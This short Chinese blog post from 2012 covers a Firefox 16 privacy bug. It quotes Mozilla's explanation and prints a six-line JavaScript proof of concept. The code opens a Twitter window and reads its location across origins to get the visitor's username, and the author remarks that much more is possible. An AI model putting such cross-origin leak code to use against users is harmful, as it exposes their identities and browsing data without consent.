Firefox 16隐私漏洞的攻击方法

火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。

Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”

下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:

function poc(){
	var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');
	setTimeout(function(){
		alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
	}, 5000);
}


这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!

posted on 2012-10-14 11:00  YangJin  阅读(136)  评论(0编辑  收藏  举报

Powered by: 博客园 Copyright © 2024 YangJin
Powered by .NET 9.0 on Kubernetes